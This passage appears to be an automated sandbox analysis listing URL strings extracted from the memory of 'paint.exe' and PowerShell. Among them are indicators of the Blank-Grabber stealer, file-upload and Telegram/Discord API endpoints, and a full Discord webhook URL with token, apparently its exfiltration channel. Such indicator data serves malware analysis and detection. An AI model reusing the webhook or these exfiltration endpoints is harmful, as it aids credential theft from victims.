Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 0000002F.00000002.1831220495.000001B38C1B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000002F.00000002.1831220495.000001B38ADDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696827300.0000020771892000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: paint.exe, 00000001.00000002.2010663767.000002077207E000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C84000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004077065.0000020772076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: paint.exe, 00000001.00000002.2012300197.0000020772CE0000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1753295021.0000020771B25000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1914665932.0000020772072000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 0000000C.00000002.1831665258.0000019D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38ABB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: paint.exe, 00000001.00000003.1914410375.0000020771D4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.stripe.com/v
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: paint.exe, 00000001.00000002.2012300197.0000020772C68000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0
Source: paint.exe, 00000001.00000003.1914410375.0000020771D4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v
Source: paint.exe, 00000001.00000002.2008689837.0000020771590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: paint.exe, 00000001.00000003.1679446910.0000020771075000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr	String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: paint.exe, 00000001.00000002.2007861507.0000020770EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: paint.exe, 00000001.00000002.2007861507.0000020770EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: paint.exe, 00000001.00000002.2008331491.0000020771290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: paint.exe, 00000001.00000002.2008331491.0000020771290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: paint.exe, 00000001.00000003.1678970007.000002077107D000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: paint.exe, 00000001.00000003.1782235643.0000020771B9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://g..b.com/h
Source: paint.exe, 00000001.00000003.1734071594.0000020771B9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://g..b.com/x
Source: paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: paint.exe, 00000001.00000003.1690340037.00000207714A0000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1690028343.0000020772398000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1690255723.0000020771843000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1690672181.00000207714A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 0000002F.00000002.1831220495.000001B38ADDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: paint.exe, 00000001.00000002.2007861507.0000020770EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: paint.exe, 00000001.00000003.1692710715.0000020771486000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1692909387.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1692909387.00000207714C3000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: paint.exe, 00000001.00000003.1711530938.0000020771B91000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771BA0000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012011288.0000020772710000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771B9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: paint.exe, 00000001.00000002.2012011288.0000020772710000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771C38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: powershell.exe, 0000002F.00000002.1831220495.000001B38BA88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: paint.exe, 00000001.00000003.1734071594.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920015922.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004727333.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781796667.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2010232784.0000020771C47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: paint.exe, 00000001.00000002.2008200069.0000020771050000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696498061.0000020771927000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: paint.exe, 00000001.00000002.2010232784.0000020771C47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: paint.exe, 00000001.00000002.2012011288.0000020772710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
Source: paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008610347.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711380871.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1771294068.00000207714FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: paint.exe, 00000001.00000002.2012300197.0000020772CC8000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: paint.exe, 00000001.00000002.2012300197.0000020772CD4000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1914665932.0000020772072000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C50000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 0000000C.00000002.1893410367.0000019D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AD6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000002F.00000002.1831220495.000001B38C1B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000002F.00000002.1831220495.000001B38C1B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: paint.exe, 00000001.00000002.2008689837.0000020771590000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr	String found in binary or memory: https://peps.python.org/pep-0205/
Source: paint.exe, 00000001.00000002.2015768208.00007FFDFB5D0000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: paint.exe, 00000001.00000003.1782149360.0000020771A23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.microsoft.c
Source: paint.exe, 00000001.00000003.1735925915.0000020771AD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1789072915.0000020771A14000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A2A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A14000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1712589930.0000020771A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.tro
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: paint.exe, 00000001.00000003.1915866896.0000020771B0A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1917249999.0000020771D1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: paint.exe, 00000001.00000003.1915866896.0000020771B2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: paint.exe, 00000001.00000003.1915866896.0000020771B0A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1917249999.0000020771D1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696827300.00000207718C2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: paint.exe, 00000001.00000003.1920015922.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1693798726.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1694074874.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781796667.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696653980.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2005810551.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2010232784.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: paint.exe, 00000001.00000003.1734071594.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920015922.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004727333.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781796667.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2010232784.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: paint.exe, 00000001.00000003.1735925915.0000020771AD5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C68000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012011288.0000020772710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
